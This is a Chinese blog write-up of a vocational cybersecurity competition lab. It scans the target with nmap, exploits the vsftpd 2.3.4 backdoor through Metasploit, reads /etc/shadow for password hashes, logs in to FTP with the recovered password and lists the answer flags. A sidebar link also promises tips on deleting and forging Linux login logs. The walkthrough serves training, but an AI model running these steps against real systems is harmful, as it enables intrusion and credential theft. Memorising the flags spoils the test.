Linux系统渗透测试0040

已于 2025-05-13 20:06:28 修改
阅读量763 收藏 6
点赞数 17
文章标签: linux 网络安全 安全
于 2025-05-13 20:03:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kanyo236/article/details/147931608
版权

服务器场景:PYsystem004
服务器场景操作系统:未知
服务器用户名:未知密码:未知


1.通过渗透机Kali对靶机服务器进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务版本信息字符串作为Flag值提交;

nmap -sV -p- 靶机IP地址

flag:vsftpd 2.3.4


2.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp文件的文件名称作为Flag值提交;

输入msfconsole,搜索第一题版本字符串,使用vsftpd2.3.4漏洞(渗透成功)

set RHOSTS 靶机IP

exploit

cd /var/www

ls

flag:1097c4f5d.bmp


3.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值提交;

我是用的cat /etc/shadow 复制的哈希密码

密码破解 太慢了

密码是admin123!@#

然后直接登录ftp就行了

cd /var/www

ls -la

直接get 1097c4f5d.bmp

然后在root文件夹里可以看到

打不开的话直接拖主机里看行了


4.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件名称作为Flag值提交;

cd /home/guest

flag:499c1097c4f5d


5.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件内容作为Flag值提交;

flag:157eb9ce33644ada6d0499c1097c4f5d


6.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件名称作为Flag值提交;

cd /var/vsftpd

flag:358dc0044


7.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件内容作为Flag值提交;

get 358dc0044.docx

flag:59b466fd93164953e56bdd1358dc0044


8.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件名称作为Flag值提交;

cd /root

ls -la

flag:93e8a5f7a


9.通过渗透机Kali对靶机服务器进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件内容作为Flag值提交。

文件内容我直接去ssh去查看

flag:2bbfa55dc58149cbdc795d293e8a5f7a

私信随时回

Kanyo236
关注
2021年江苏省中职组“网络空间安全”赛项
m0_45155797的博客
04-05 212
2021年江苏省中职组“网络空间安全”赛项 镜像名:PYsystem0040 操作有什么问题,麻烦师傅们指出!
2023年广东省网络安全竞赛——Windows 操作系统渗透解析(超级详细)
旺仔Sec&blog
03-29 822
2023年广东省网络安全竞赛——Windows 操作系统渗透解析(超级详细)
2023年江苏省职业院校技能大赛中职赛项
weixin_51741741的博客
12-03 1382
三、拓扑图四、竞赛任务书(一)第一阶段任务书(300分)任务一:主机发现与信息收集(50分)假定你是A集团的网络安全工程师,对于企业的服务器系统,根据任务要求获取局域网中存活主机,并对这这些主机进行信息收集,分析判断主机安全性。任务环境说明:√ 服务器场景:JSsystem0001√ 服务器场景操作系统Linux√ 服务器场景用户名:root 密码:1234561.通过渗透机Kali2.0对靶机场景进行TCP同步扫描 (使用Nmap工具),并将该操作使用命令中必须要使用的参数作为Flag值提交;(6分)
2023年江苏省职业院校技能大赛中职网络安全赛项试卷-教师组任务书
旺仔Sec&blog
03-11 2600
2023年江苏省职业院校技能大赛中职网络安全赛项试卷-教师组任务书
网安赛题整理
武恩赐
02-13 1347
网安赛题整理
Kali Linux渗透测试技术详解
最新发布
02-19
第1篇为Iinux安全渗透测试基础,介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限...
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
基于Kali-Linux渗透测试方法的研究与设计.pdf
09-06
Kali-Linux系统可以帮助渗透测试人员快速地进行渗透测试,提高测试效率和能力。 知识点三:渗透测试的步骤 渗透测试的步骤可以分为以下几个步骤: 1. 情报收集:收集目标系统的信息,包括IP地址、开放端口、操作...
渗透测试TIPS之删除伪造Linux系统登录日志1
08-03
渗透测试过程中,为了隐藏入侵者的踪迹,避免被系统管理员发现,删除和伪造Linux系统的登录日志是一项关键技能。本文将深入探讨如何处理Linux中的utmp、wtmp、btmp以及lastlog这些与登录相关的二进制日志文件。 ...
P10-经典赛题-Linux操作系统渗透测试.docx
03-29
中职网络安全赛题解析,P10-经典赛题-Linux操作系统渗透测试,MySQL数据库弱口令,nc高位端口链接
2022年宜昌市中职组“网络安全”赛项样题(一)
旺仔Sec&blog
05-07 1883
4.靶机服务器上的网站可能存在文件包含漏洞,要求选手找到文件包含的相关漏洞,与别的漏洞相结合获取一定权限并进行提权;5.操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限;2.靶机服务器上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限;3.靶机服务器上的网站可能存在文件上传漏洞,要求选手找到文件上传的相关漏洞,利用此漏洞获取一定权限;5.系统加固时需要保证靶机对外提供服务的可用性,服务只能更改配置,不允许更改内容;
中职网络安全-B模块-Linux操作系统渗透测试任务环境说明
小苏
03-04 702
Linux安全测试,通过本地PC中渗透测试平台Kali对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中MySQL数据库对应的服务版本信息字符串作为FLAG提交;
Kali Linux渗透测试技术详解_渗透测试入门
ZL_1618的博客
03-21 1564
Kali Linux作为攻击端,为了以后能模拟漏洞场景,我还装了一个Debian11的虚拟机,Debian 11是官网下载的镜像文件,在Vmware中安装的时候有图文提示,一路安装正常,也设置了普通用户和root的登录密码,默认安装成功进入了图形化界面,作为专业开发我肯定想让他进入命令行模式,我在图形登录界面试了一下Ctro+Alt+F1-F6试了一下,Ctro+Alt+F3进入命令行,然后切换到root用户。为了方便用户进行渗透方面的工作,有人将所有的工具都预装在一个Linux系统,其中。
2020年度中职组“网络空间安全”赛项
PushSafe
04-04 1608
2020年度中职组“网络空间安全”赛项 江西省竞赛任务书 一、竞赛时间 8:30-11:30,共计3小时。 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第一阶段单兵模式系统渗透测试 任务一 简单sql注入 8:30-10:10 150 任务二 利用python脚本进行web渗透测试 150 任务三 数据分析-A 200 任务四 Windows操作系统渗透测试 200 备战阶段 攻防对抗准备工作 10:10-10:30 0 第二阶段分组对抗 系统加固 10:30-10:45 300 渗透
Linux操作系统渗透测试
JJH2724719395的博客
02-16 1868
linux渗透
2021年江苏省职业院校技能大赛中职网络信息安全赛项试卷
FogIslandBay的博客
09-25 6073
任务五:Linux操作系统渗透测试 通过渗透机Kali对靶机服务器进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务版本信息字符串作为Flag值提交;(1分) 通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp文件的文件名称作为Flag值提交;(1分) 通过渗透机Kali对靶机服务器进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值提交;(1分) 通过渗透机Kali对靶机服务器进行渗
2023年广东省网络安全竞赛——Linux 操作系统渗透解析(超级详细)
旺仔Sec&blog
03-29 2452
2023年广东省网络安全竞赛——Linux 操作系统渗透解析(超级详细)
中职网络空间安全windows渗透
qq_61988806的博客
03-14 736
服务器场景操作系统:Windows7。服务器场景:Server2003。这里要用管理员打开cmd。使用ms17-010。
2021全国职业技能大赛郑州市“网络空间安全赛项”赛题及赛题解析(超详细)
Aluxian_的博客
11-12 6000
2021年中职组“网络空间安全”赛项一.郑州市竞赛任务书二.任务书解析三.任务书答案四.不懂的可以私信博主! 一.郑州市竞赛任务书 一、竞赛时间 8:00—11:00 共计3小时 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第①阶段: 单兵模式系统渗透测试 任务一: SSH弱口令渗透测试 任务二: Linux操作系统渗透测试 任务三: 服务器内部信息获取 任务四: Windows操作系统渗透测试 任务五: Linux操作系统渗透测试 任务六: Web安全之综合渗透测试 备战阶段 休息20
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值